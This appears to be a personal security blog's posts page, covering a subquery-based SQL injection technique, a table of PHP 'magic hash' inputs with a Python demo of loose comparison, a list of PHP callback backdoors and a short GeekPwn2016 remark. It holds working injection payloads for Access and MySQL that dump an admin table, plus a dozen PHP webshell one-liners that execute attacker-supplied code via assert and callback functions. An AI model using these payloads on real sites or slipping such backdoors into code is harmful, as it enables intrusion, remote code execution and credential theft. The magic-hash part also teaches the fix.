Posts by admin

Subquery-based SQL injection: no need to guess column names

Preconditions: the table name is known, the column names are not, and the database supports subqueries. This is particularly useful against Access, and also as a shortcut, for example when reading data out of the flag table in various CTFs.

Idea: inside a subquery, write a UNION query against the target table. The first SELECT uses a constant as a placeholder for each column and gives each one an alias; the UNION that follows selects all columns (*) of the target table; finally, run a UNION query or a blind injection against the result set of that subquery.

For example, given the following injection point:

select title,time,author,content from article where id={inject here}

The query has four columns; the table name admin is known, but admin's columns are not. First guess the total number of columns in admin by adding an ORDER BY inside the subquery; 999999999 is a non-existent id:

select title,time,author,content from article where id=999999999 union select 1,2,3,4 from(select * from admin order by 1)

Assuming the column count turns out to be five, build the subquery's UNION statement and assign the aliases:

select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin

Finally, query the result set of that subquery:

select title,time,author,content from article where id=999999999 union select 1,2,3,field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5 from(select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin)

For blind injection it can be done like this (when the responses differ):

select title,time,author,content from article where id=999999999 or (select top 1 len(field_1) from(select 1 as field_1,2,3,4,5 from admin where 1=2 union select * from admin))>0

Or like this (when every substitution throws an error no matter what, or when the only distinction is 500 vs 200):

select title,time,author,content from article where id=999999999 or iif((select top 1 len(field_1) from(select 1 as field_1,2,3,4,5 from admin where 1=2 union select * from admin))>0,1,(select 2 from multi_rows_table))=1

multi_rows_table must contain more than one row. Finally, some databases require an alias on the subquery (Access does not, so none is given above). To be clear, all of the queries above are Access payloads; in MySQL syntax it can be written as follows:

select title,time,author,content from article where id=999999999 union select 1,2,3,concat(field_1,0x23,field_2,0x23,field_3,0x23,field_4,0x23,field_5) from(select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin) as sb;

Reposted from http://www.hazzel.cn/archives/3.html


PHP magic hashes

I do think php is the best language...
| Algorithm | Hex length | Input | Digest |
|---|---|---|---|
| md2 | 32 | 505144726 | 0e015339760548602306096794382326 |
| md4 | 32 | 48291204 | 0e266546927425668450445617970135 |
| md5 | 32 | 240610708 | 0e462097431906509019562988736854 |
| sha1 | 40 | 10932435112 | 0e07766915004133176347055865026311692244 |
| sha224 | 56 | – | – |
| sha256 | 64 | – | – |
| sha384 | 96 | – | – |
| sha512 | 128 | – | – |
| ripemd128 | 32 | 315655854 | 0e251331818775808475952406672980 |
| ripemd160 | 40 | 20583002034 | 00e1839085851394356611454660337505469745 |
| ripemd256 | 64 | – | – |
| ripemd320 | 80 | – | – |
| whirlpool | 128 | – | – |
| tiger128,3 | 32 | 265022640 | 0e908730200858058999593322639865 |
| tiger160,3 | 40 | 13181623570 | 00e4706040169225543861400227305532507173 |
| tiger192,3 | 48 | – | – |
| tiger128,4 | 32 | 479763000 | 00e05651056780370631793326323796 |
| tiger160,4 | 40 | 62241955574 | 0e69173478833895223726165786906905141502 |
| tiger192,4 | 48 | – | – |
| snefru | 64 | – | – |
| snefru256 | 64 | – | – |
| gost | 64 | – | – |
| adler32 | 8 | FR | 00e00099 |
| crc32 | 8 | 2332 | 0e684322 |
| crc32b | 8 | 6586 | 0e817678 |
| fnv132 | 8 | 2186 | 0e591528 |
| fnv164 | 16 | 8338000 | 0e73845709713699 |
| joaat | 8 | 8409 | 0e074025 |
| haval128,3 | 32 | 809793630 | 00e38549671092424173928143648452 |
| haval160,3 | 40 | 18159983163 | 0e01697014920826425936632356870426876167 |
| haval192,3 | 48 | 48892056947 | 0e4868841162506296635201967091461310754872302741 |
| haval224,3 | 56 | – | – |
| haval256,3 | 64 | – | – |
| haval128,4 | 32 | 71437579 | 0e316321729023182394301371028665 |
| haval160,4 | 40 | 12368878794 | 0e34042599806027333661050958199580964722 |
| haval192,4 | 48 | – | – |
| haval224,4 | 56 | – | – |
| haval256,4 | 64 | – | – |
| haval128,5 | 32 | 115528287 | 0e495317064156922585933029613272 |
| haval160,5 | 40 | 33902688231 | 00e2521569708250889666329543741175098562 |
| haval192,5 | 48 | 52888640556 | 0e9108479697641294204710754930487725109982883677 |
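Why these pairs matter, as an added example that is not part of the original post: when PHP compares two strings with `==` and both look numeric, it compares them as numbers, so any digest of the form `0e` followed only by digits is read as 0.0 and equals every other such digest. The Python below models that rule (`php_loose_equals` is a simplified model, not PHP itself), reproduces the md5 and sha1 rows of the table with hashlib, and contrasts the vulnerable comparison with a byte-exact one; `QNKCDZO` is an extra well-known md5 magic-hash preimage that is not in the table.

```python
import hashlib
import hmac
import re

# Simplified model of PHP's numeric-string rule: a string that parses as a
# decimal or scientific-notation number is compared numerically by `==`.
_NUMERIC = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_equals(a: str, b: str) -> bool:
    """Model of PHP `$a == $b` for two strings (the type juggling the table exploits)."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)   # "0e462..." -> 0.0, "0e830..." -> 0.0
    return a == b


def is_magic_hash(hexdigest: str) -> bool:
    """True when the hex digest is '0e' followed only by digits (PHP reads it as 0.0)."""
    return re.fullmatch(r"0e\d+", hexdigest) is not None


def hexdigest(algo: str, text: str) -> str:
    """Hex digest of `text` under a hashlib algorithm name such as 'md5' or 'sha1'."""
    return hashlib.new(algo, text.encode()).hexdigest()


def loose_check(stored_hash: str, candidate: str, algo: str = "md5") -> bool:
    """Vulnerable pattern: `if (md5($input) == $stored_hash)`."""
    return php_loose_equals(hexdigest(algo, candidate), stored_hash)


def strict_check(stored_hash: str, candidate: str, algo: str = "md5") -> bool:
    """Hardened pattern: byte-exact, constant-time comparison (PHP: hash_equals() or ===)."""
    return hmac.compare_digest(hexdigest(algo, candidate), stored_hash)


# Demo values: the md5 row of the table as the stored hash, and "QNKCDZO"
# (another well-known md5 magic-hash preimage, not from the table) as the guess.
STORED_MD5 = hexdigest("md5", "240610708")   # 0e462097431906509019562988736854
GUESS = "QNKCDZO"                             # its md5 is also "0e" + digits

if __name__ == "__main__":
    print("stored digest is magic:", is_magic_hash(STORED_MD5))
    print("loose == accepts the wrong password:", loose_check(STORED_MD5, GUESS))
    print("hash_equals rejects it:", not strict_check(STORED_MD5, GUESS))
```

Auditing for `==`/`!=` on hash or token strings and replacing them with `hash_equals()` (or `===`) removes the whole class of matches the table describes.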


A few PHP callback backdoors

header_register_callback(create_function('','return assert($_POST[\'k\']);'));

$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['pass']);

Database callback backdoor

$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));

$e = $_REQUEST['e'];

register_shutdown_function($e, $_REQUEST['pass']);

mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['pass']);

array_reduce(array($_POST['k']),create_function('$a,$b','return assert($b);'));

set_exception_handler(create_function('','return assert($_GET[k]);'));
throw new exception();

class a
{
  public function __construct($args)
  {
    forward_static_call('assert',$args);
  }
}
new a($_POST[k]);

iterator_apply(new arrayiterator(array($_GET['k'])),create_function('Iterator $i','assert($i->current());'),array(new arrayiterator(array($_GET['k']))));

array_intersect_ukey(array($_GET['k']=>'1'),array($_GET['k']=>'1'),'assert');

array_uintersect_uassoc(array($_GET[k]),array(''),'assert','strstr');

array_intersect_uassoc(array($_POST['k']=>''),array(''),'assert');

filter_var("phpinfo();" ,1024, array("options" => "assert"));


Notes on a tricky GeekPwn2016 challenge

I did badly at GeekPwn... didn't even make it to the finals. Not happy.

First time doing a CTF this close to real-world practice.

See the attachment for the detailed writeup (annoyingly, Typecho can't paste directly from Word...)

emage.pdf